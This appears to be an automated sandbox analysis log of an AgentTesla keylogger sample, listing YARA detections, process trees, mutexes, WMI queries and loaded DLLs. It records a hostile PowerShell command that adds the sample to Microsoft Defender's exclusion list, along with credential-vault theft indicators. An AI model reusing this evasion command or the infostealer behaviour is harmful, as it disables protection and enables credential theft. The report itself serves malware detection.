                    Source: 10.2.newapp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 10.2.newapp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 7.2.newapp.exe.3ba2480.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 7.2.newapp.exe.3ba2480.3.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 7.2.newapp.exe.3b65260.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 7.2.newapp.exe.3b65260.5.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 11.2.newapp.exe.4271d80.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 11.2.newapp.exe.4271d80.4.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 7.2.newapp.exe.3ba2480.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 7.2.newapp.exe.3ba2480.3.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 7.2.newapp.exe.3b65260.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 7.2.newapp.exe.3b65260.5.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.dhPWt112uC.exe.3821f18.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.dhPWt112uC.exe.3821f18.2.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.dhPWt112uC.exe.37e4cf8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.dhPWt112uC.exe.37e4cf8.3.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeCode function: 0_2_00B7D3A40_2_00B7D3A4
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeCode function: 0_2_04BF66980_2_04BF6698
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeCode function: 0_2_04BF66880_2_04BF6688
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeCode function: 0_2_04BF00060_2_04BF0006
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeCode function: 0_2_04BF00400_2_04BF0040
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeCode function: 0_2_04BFEF380_2_04BFEF38
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeCode function: 0_2_04BFEF330_2_04BFEF33
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeCode function: 0_2_06ABA7A80_2_06ABA7A8
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeCode function: 0_2_06ABA7980_2_06ABA798
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeCode function: 0_2_06AB87180_2_06AB8718
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeCode function: 0_2_06ABB1A00_2_06ABB1A0
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeCode function: 0_2_06ABB1B00_2_06ABB1B0
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeCode function: 0_2_06AB8FA80_2_06AB8FA8
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeCode function: 0_2_06AB8B700_2_06AB8B70
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeCode function: 0_2_06ABF8D80_2_06ABF8D8
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeCode function: 4_2_031AEB204_2_031AEB20
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeCode function: 4_2_031A4A684_2_031A4A68
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeCode function: 4_2_031A3E504_2_031A3E50
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeCode function: 4_2_031A41984_2_031A4198
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeCode function: 4_2_031A19804_2_031A1980
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeCode function: 4_2_031AADB04_2_031AADB0
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeCode function: 4_2_06F8697C4_2_06F8697C
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeCode function: 4_2_06F86E104_2_06F86E10
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeCode function: 4_2_06F8696C4_2_06F8696C
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeCode function: 4_2_06F85D484_2_06F85D48
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeCode function: 4_2_06F85D3A4_2_06F85D3A
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeCode function: 4_2_06F966D84_2_06F966D8
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeCode function: 4_2_06F956A84_2_06F956A8
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeCode function: 4_2_06F97E604_2_06F97E60
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeCode function: 4_2_06F935684_2_06F93568
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeCode function: 4_2_06F9B2FF4_2_06F9B2FF
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeCode function: 4_2_06F9C2604_2_06F9C260
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeCode function: 4_2_06F977804_2_06F97780
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeCode function: 4_2_06F927514_2_06F92751
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeCode function: 4_2_06F9E4904_2_06F9E490
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeCode function: 4_2_06F95DCF4_2_06F95DCF
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeCode function: 4_2_06F900404_2_06F90040
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 7_2_00D8D3A47_2_00D8D3A4
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 7_2_055687397_2_05568739
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 7_2_0556A7987_2_0556A798
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 7_2_0556A7A87_2_0556A7A8
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 7_2_0556B1B07_2_0556B1B0
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 7_2_0556F3187_2_0556F318
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 7_2_05568FA87_2_05568FA8
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 7_2_05568B707_2_05568B70
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 10_2_0181EA0910_2_0181EA09
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 10_2_01814A6810_2_01814A68
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 10_2_01813E5010_2_01813E50
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 10_2_0181419810_2_01814198
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 10_2_0181AC9010_2_0181AC90
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 10_2_06F0415C10_2_06F0415C
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 10_2_06F06A5010_2_06F06A50
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 10_2_06F05D6810_2_06F05D68
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 10_2_06F05D5A10_2_06F05D5A
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 10_2_06F156B010_2_06F156B0
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 10_2_06F1357010_2_06F13570
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 10_2_06F1B30710_2_06F1B307
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 10_2_06F1778810_2_06F17788
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 10_2_06F15DD710_2_06F15DD7
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 10_2_06F1004010_2_06F10040
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 10_2_06F1003F10_2_06F1003F
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 11_2_0156D3A411_2_0156D3A4
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 11_2_0564669811_2_05646698
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 11_2_0564668811_2_05646688
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 11_2_0564004011_2_05640040
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 11_2_0564000611_2_05640006
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 11_2_0564EF2811_2_0564EF28
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 11_2_0564EF3811_2_0564EF38
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 11_2_0564EF0011_2_0564EF00
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 15_2_02A6EA1015_2_02A6EA10
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 15_2_02A64A6815_2_02A64A68
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 15_2_02A63E5015_2_02A63E50
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 15_2_02A6AC9015_2_02A6AC90
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 15_2_02A6419815_2_02A64198
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 15_2_069C415C15_2_069C415C
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 15_2_069C6A3015_2_069C6A30
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 15_2_069C5D5B15_2_069C5D5B
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 15_2_069C5D6815_2_069C5D68
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 15_2_069D56B015_2_069D56B0
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 15_2_069D66E015_2_069D66E0
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 15_2_069D7E6815_2_069D7E68
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 15_2_069D357015_2_069D3570
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 15_2_069DC26815_2_069DC268
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 15_2_069DB31815_2_069DB318
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 15_2_069D778815_2_069D7788
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 15_2_069DE49815_2_069DE498
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 15_2_069D5DE815_2_069D5DE8
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 15_2_069D004015_2_069D0040
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 15_2_069D003F15_2_069D003F
                    Source: dhPWt112uC.exe, 00000000.00000000.1689490418.0000000000353000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameCFss.exe6 vs dhPWt112uC.exe
                    Source: dhPWt112uC.exe, 00000000.00000002.1778647173.00000000027EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename4050351b-3b81-4030-83d1-4403e211abfe.exe4 vs dhPWt112uC.exe
                    Source: dhPWt112uC.exe, 00000000.00000002.1778647173.000000000283E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs dhPWt112uC.exe
                    Source: dhPWt112uC.exe, 00000000.00000002.1790792317.00000000072C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs dhPWt112uC.exe
                    Source: dhPWt112uC.exe, 00000000.00000002.1777103060.000000000092E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs dhPWt112uC.exe
                    Source: dhPWt112uC.exe, 00000000.00000002.1784185086.0000000004EC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs dhPWt112uC.exe
                    Source: dhPWt112uC.exe, 00000000.00000002.1779513713.00000000037E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename4050351b-3b81-4030-83d1-4403e211abfe.exe4 vs dhPWt112uC.exe
                    Source: dhPWt112uC.exe, 00000000.00000002.1779513713.00000000037E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs dhPWt112uC.exe
                    Source: dhPWt112uC.exe, 00000004.00000002.4162645748.0000000001339000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs dhPWt112uC.exe
                    Source: dhPWt112uC.exeBinary or memory string: OriginalFilenameCFss.exe6 vs dhPWt112uC.exe
                    Source: dhPWt112uC.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 11.2.newapp.exe.4271d80.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 11.2.newapp.exe.4271d80.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.dhPWt112uC.exe.3821f18.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.dhPWt112uC.exe.3821f18.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.dhPWt112uC.exe.37e4cf8.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.dhPWt112uC.exe.37e4cf8.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 10.2.newapp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.newapp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 7.2.newapp.exe.3ba2480.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 7.2.newapp.exe.3ba2480.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 7.2.newapp.exe.3b65260.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 7.2.newapp.exe.3b65260.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 11.2.newapp.exe.4271d80.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 11.2.newapp.exe.4271d80.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 7.2.newapp.exe.3ba2480.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 7.2.newapp.exe.3ba2480.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 7.2.newapp.exe.3b65260.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 7.2.newapp.exe.3b65260.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.dhPWt112uC.exe.3821f18.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.dhPWt112uC.exe.3821f18.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.dhPWt112uC.exe.37e4cf8.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.dhPWt112uC.exe.37e4cf8.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: dhPWt112uC.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: newapp.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@19/9@2/2
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dhPWt112uC.exe.logJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMutant created: NULL
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMutant created: \Sessions\1\BaseNamedObjects\dPVmIzaDRidISKmqloneynbSFJ
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nb50sxt2.ug4.ps1Jump to behavior
                    Source: dhPWt112uC.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: dhPWt112uC.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: dhPWt112uC.exeVirustotal: Detection: 75%
                    Source: dhPWt112uC.exeReversingLabs: Detection: 75%
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeFile read: C:\Users\user\Desktop\dhPWt112uC.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\dhPWt112uC.exe "C:\Users\user\Desktop\dhPWt112uC.exe"
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhPWt112uC.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess created: C:\Users\user\Desktop\dhPWt112uC.exe "C:\Users\user\Desktop\dhPWt112uC.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhPWt112uC.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess created: C:\Users\user\Desktop\dhPWt112uC.exe "C:\Users\user\Desktop\dhPWt112uC.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
